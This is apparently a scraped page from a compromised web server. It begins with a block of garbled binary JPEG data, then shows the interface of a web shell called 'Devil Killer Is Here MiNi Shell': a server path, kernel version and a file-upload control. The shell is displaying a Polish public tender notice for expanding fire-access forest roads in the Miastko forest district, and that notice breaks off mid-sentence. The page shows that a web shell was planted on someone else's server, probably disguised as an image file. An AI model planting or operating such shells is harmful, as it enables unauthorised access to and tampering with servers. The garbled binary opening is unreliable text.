JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230406/0016730201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa dróg na terenie nadleśnictwa Miastko </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO MIASTKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770528319</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">14a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pasieka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">77-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598573201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 857 22 64</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">miastko@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://miastko.szczecinek.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa dróg na terenie nadleśnictwa Miastko </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d0e7909e-d442-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00167302</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00103490/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa dróg na terenie nadleśnictwa Miastko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo.miastko <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo.miastko</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy SmartPZP (dalej – „Platforma”). Wszelkie ośw, wnioski, zawiad oraz inf,<br/>przekazywane za pośrednictwem Platformy, przekazywane są w zakładce „Korespondencja”. Dopuszcza się również<br/>korespondencję za pomocą poczty elektr email: miastko@szczecinek.lasy.gov.pl.Sposób sporządzenia i przekazywania inf oraz<br/>wymagań techn dla dok elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania inf oraz<br/>wymagań techn dla dok elektr oraz środków komunikacji elektr w post o udzielenie zamówienia publicznego lub konkursie (Dz. U. z<br/>2020 r. poz. 2452).Za datę wpływu ośw, ofert, wniosków, zaświadczeń oraz inf przyjmuje się datę ich przekazania do Platformy.<br/>Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy. W celu<br/>skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem:https://portal.smartpzp.pl/nadlesnictwo.miastko po<br/>kliknięciu na przycisk „Załóż konto”. Zamawiający, informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektr. Do<br/>przesłania dok i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego. Maksymalny rozmiar plików przesyłanych<br/>za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 100 MB. Ofertę oraz<br/>oświadczenia, składane na podstawie art. 125 ust. 1 PZP (sporządzane wg wzorów stanowiących odpowiednio załącznik nr 3A i 3B<br/>do SWZ), sporządza się, pod rygorem nieważności w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektr) lub w<br/>postaci elektr opatrzonej podpisem zaufanym lub podpisem osobistym. przesyłane dokumenty powinny być załączone w formie<br/>plików w formacie odpowiednio . png, .jpg, .jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt,<br/>.ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg,wymagania sprzętowe dla Wykonawcy: przeglądarka intern Mozzilla Firefox ver.65 i<br/>późniejsze, Google Chrome ver.66 i późniejsze lub Opera ver.58 i późniejsze, Microsoft Edge ver18 i późniejsze, Internet Explorer<br/>11, lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych<br/>wersji przeglądarek, system oper Windows 7 i późniejsze,zainstalowane środowisko Java w wersji min. 1.8 (jre),w przypadku<br/>przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,oprogramowanie SzafirHost w<br/>systemie operacyjnym, stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniej niż 1Mb/s, komputer klasy PC lub<br/>MAC, o następującej konfiguracji: pamięć min. 3GB RAM, procesor 1500MHz lub lepszy, jeden z systemów operac Linux Kernel4.0,<br/>Windows 7 i MacOS 10.12 - lub ich nowsze wersje, zainstalowany program Acrobat Reader lub inny umożliwiający obsługę<br/>formatów .pdf. Pozostałe wymagania tech i organizacyjne wysyłania i odbierania dok elektr, elektr kopii dok i oświadczeń oraz inf<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy. Regulamin dostępny pod adresem:<br/>https://portal.smartpzp.pl/nadlesnictwo.miastko/elearning.Wszelkie inf stanowiące tajemnicę przedsięb w rozumieniu ustawy z dnia<br/>16kwietnia1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako<br/>tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polec „Zał stanowiący<br/>tajemnicę przedsięb”. w zależności od formatu kwalifikowanego podpisu (PAdES, XAdES) i jego typu (zewn,wewn) wyk dołącza do<br/>Platf uprzednio podpisane dok wraz z wygener plikiem podpisu (typ zewn) lub dok z wszytym podpisem(typ wewn): dok w<br/>form„pdf”należy podpisywać tylko formatem PAdES Zam dopuszcza<br/>podpis dok w formacie innym niż „pdf” wtedy należy użyć format XAdES Pełen opis w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art.13 ust.1 i2 rozporządzenia Parlamentu Europ i Rady (UE) 2016/679 z<br/>dnia 27kwietnia2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zam informuje, iż administr danych osobowych jest Nadleśnictwo Miastko. Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych p. Marcelinę Goryńską, z którym w sprawach dot przetwarzania danych osob<br/>możnaskontaktować się za pośrednictwem poczty elektrj pod adresem iod@comp-net.pl lub telefonicznie pod numerem796 400<br/>811.Zam.przetwarza dane osobowe zebrane w niniejszym postęp o udzielenie zam publ w sposób gwarantujący zabezp przed ich<br/>bezprawnym rozpowszechnianiem. Zam udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze śr ochrony prawnej, o których mowa w dziale IXPZP, do upływu terminu do ich wniesienia. Do przetw danych osob, o<br/>których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetw<br/>takich danych są obowiązane do zachowania ich w poufności Dane osobowe przetwarzane będą na podst art. 6 ust. 1 lit. c RODO w przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publ oraz jej realizacji, a także udokument<br/>postęp o udzielenie zam i jego archiwizacji.Odbiorcami danych osob będą osoby lub podmioty, którym dok postęp. zostanie<br/>udostępniona w oparciu o przepisy PZP, a także na podstawie ustawy o dostępie do informacji publ.Dane osob pozyskane w<br/>związku z prowadzeniem niniejszego postęp o udzielenie zam publ będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres<br/>4 lat od dnia zakończenia postęp o udzielenie zam publ, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy w sprawie zam publ.<br/>Dane osob pozyskane w związku z prowadz niniejszego postęp o udzielenie zam mogą zostać przekazane podmiotom świadczącym<br/>usługi doradcze, w tym usługi prawne, i konsultingowe, Osoba, której dotyczą pozyskane w związku z prowadz niniejszego postęp<br/>dane osob, ma prawo:1)dostępu do swoich danych osobowych – zgodnie z art. 15RODO, przy czym w sytuacji, gdy wykonanie<br/>obowiązków, o których mowa w art.15ust.1-3RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego<br/>bądź zakończonego postępowania o udzielenie zamówienia publicznego;do sprostowana swoich danych osobo–zgodnie z<br/>art.16RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osob o którym mowa w art. 16RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników;do żądania od Zam – jako administr,<br/>ograniczenia przetwarzania danych osob z zastrzeżeniem przypadków, o których mowa w art.18 ust.2RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze śr ochr<br/>prawnej lub w celu ochr praw innej osoby fiz lub prawnej, lub z uwagi na ważne względy interesu publ UE lub państwa członk; prawo<br/>to nie ogranicza przetwarzania danych osobowych do czasu zakończenia postęp o udzielenie zam publo;wniesienia skargi do<br/>Prezesa UODO w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochr danych osob, w tym przepisy<br/>RODO.Obowiązek podania danych osob jest wymog ust określ w przepisach PZP, związanym z udziałem w postęp o udziel zam<br/>publ; konsekwencje niepodania określ danych określa PZP. Pozostałe informacje w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 451216,75 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy przedmiotu zamówienia:<br/>Przedmiotem zamówienia jest rozbudowa dojazdu pożarowego – drogi leśnej pożarowej nr 13 w leśnictwie Słosinko<br/>Przedmiot zamówienia obejmuje w szczególności:<br/>Część nr 1 zamówienia:<br/>rozbudowę istniejącej drogi leśnej pożarowej nr 13 o odcinku 646 m o nawierzchni z płyt wielootworowych w układzie<br/>dwuśladowym, na mijankach i zjazdach w układzie pełnym na podbudowie odcinającej z pospółki.<br/>1. Parametry obiektu budowlanego:<br/>- szerokość drogi 5,00 m (na poszerzeniu na łuku 8,00 m),<br/>- szerokość jezdni drogi 3,00 m (na poszerzeniu na łuku 6,00 m),<br/>- szerokość poboczy drogi 1,0 m,<br/>- mijanki szerokości 3,50 m, długości 23,0 m ze skosami wjazdowymi długości po 10m.<br/>2. Warstwy konstrukcyjne nawierzchni drogi:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- warstwa odcinająca z pospółki o gr. 10 cm,<br/>- nawierzchnia z płyt wielootworowych 100x75x12,5 cm.<br/>3. Konstrukcja nawierzchni poboczy:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- kruszywo łamane frakcji 0-31,5 mm stabilizowane mechanicznie gr. 22 cm przy zjazdach, w pozostałych miejscach gr. 12<br/>cm.<br/>4. Konstrukcja nawierzchni zjazdów i mijanek:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- kruszywo łamane frakcji 0-31,5 mm stabilizowane mechanicznie gr. 22 cm.<br/>5. Pas między płytami układanymi śladowo należy wypełnić kruszywem łamanym frakcji 0-31,5 mm.<br/>6. Przebudowa zjazdu na drogę gminną<br/>- w obrębie łuku R=9 m nawierzchnię należy obramować zatopionym opornikiem betonowym 12x25 cm ustawionym na<br/>ławie betonowej C12/15 z oporem,<br/>- płyty należy dociąć do opornika lub wypełnić brukiem kamiennym układanym na warstwie betonu gr. 10 cm.<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi:<br/>- dokumentacja projektowa,<br/>- specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiORB).<br/>Miejscem realizacji przedmiotu zamówienia będzie teren Nadleśnictwa Miastko:<br/>- w zakresie części nr 1 zamówienia:<br/>teren Nadleśnictwa Miastko, leśnictwo Słosinko, droga leśna pożarowa (dojazd pożarowy) nr 13 odcinek 0,646 km na<br/>terenie :<br/>- województwo pomorskie, powiat Bytowski, gmina Miastko, obręb Słosinko na działach ewidencyjnych nr : 93/2, 239/1,<br/>239/5,<br/>- województwo pomorskie, powiat Bytowski, gmina Miastko, obręb Przeradź na działkach ewidencyjnych nr : 23, 257/2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 261413,41 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze ofert na każdą część zamówienia Zamawiający będzie się kierował następującymi<br/>kryteriami oceny ofert:<br/>1) Cena (C) - 60 %<br/>2) Okres gwarancji (G) - 40 %<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2. W ramach kryterium „Okres gwarancji” (G) ocena ofert zostanie dokonana w następujący sposób:<br/>Sposób obliczenia punktów dla kryterium okres gwarancji jakości:<br/>a. Kryterium okresu gwarancji jakości na całość zamówienia będzie<br/>rozpatrywane na podstawie zadeklarowanego w formularzu ofertowym okresu gwarancji jakości.<br/>b. Maksymalną liczbę punktów jaką można uzyskać w tym kryterium to 40 punktów.<br/>c. Najkrótszy możliwy okres gwarancji wymagany przez Zamawiającego to 36 miesięcy liczonych od daty końcowego odbioru robót.<br/>Najdłuższy oceniany w ramach kryterium okres gwarancji to 60 miesięcy. Jeżeli Wykonawca zaproponuje dłuższy okres gwarancji<br/>niż 60 miesięcy, do oceny oferty w przedmiotowym kryterium zostanie przyjęty 60 miesięczny okres gwarancji jakości.<br/>d. Wykonawca może zaproponować okres gwarancji jakości w pełnych miesiącach. Jeżeli wykonawca wpisze okres gwarancji<br/>krótszy niż 36 miesiące to przygotuje ofertę niezgodnie z SWZ co skutkować będzie odrzuceniem oferty.<br/>e. W przypadku nie wypełnienia w formularzu ofertowym stosownej rubryki Zamawiający uzna, że wykonawca deklaruje najkrótszy tj.<br/>36 miesięczny okres gwarancji jakości.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta wykonawcy, która uzyska największą liczbę punktów w/w kryteriach oceny ofert.<br/>Pełen i szczegółowy opis w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy przedmiotu zamówienia:<br/>Przedmiotem zamówienia jest rozbudowa drogi pożarowej nr 2 w leśnictwie Łodzierz.<br/>Przedmiot zamówienia obejmuje w szczególności:<br/>Część nr 2 zamówienia:<br/>rozbudowę istniejącej drogi leśnej pożarowej nr 2 o odcinku 343,85 m o nawierzchni z płyt wielootworowych układzie<br/>dwuśladowym, na mijankach i zjazdach w układzie pełnym na podbudowie odcinającej z pospółki.<br/>1. Parametry obiektu budowlanego:<br/>- szerokość drogi 5,00 m,<br/>- szerokość jezdni drogi 3,00 m,<br/>- szerokość poboczy drogi 1,0 m,<br/>- mijanki szerokości 3,50 m, długości 24,0 m ze skosami wjazdowymi długości po 17m.<br/>2. Warstwy konstrukcyjne nawierzchni drogi:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- warstwa odcinająca z pospółki o gr. 10 cm,<br/>- nawierzchnia z płyt wielootworowych 100x75x12,5 cm.<br/>3. Konstrukcja nawierzchni poboczy:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- kruszywo łamane frakcji 0-31,5 mm stabilizowane mechanicznie gr. 22 cm przy zjazdach, w pozostałych miejscach gr. 12<br/>cm.<br/>4. Konstrukcja nawierzchni zjazdów i mijanek:<br/>- istniejąca nawierzchnia wyprofilowana i zagęszczona do wskaźnika zagęszczenia 0,97,<br/>- kruszywo łamane frakcji 0-31,5 mm stabilizowane mechanicznie gr. 22 cm.<br/>5. Pas między płytami układanymi śladowo należy wypełnić kruszywem łamanym frakcji 0-31,5 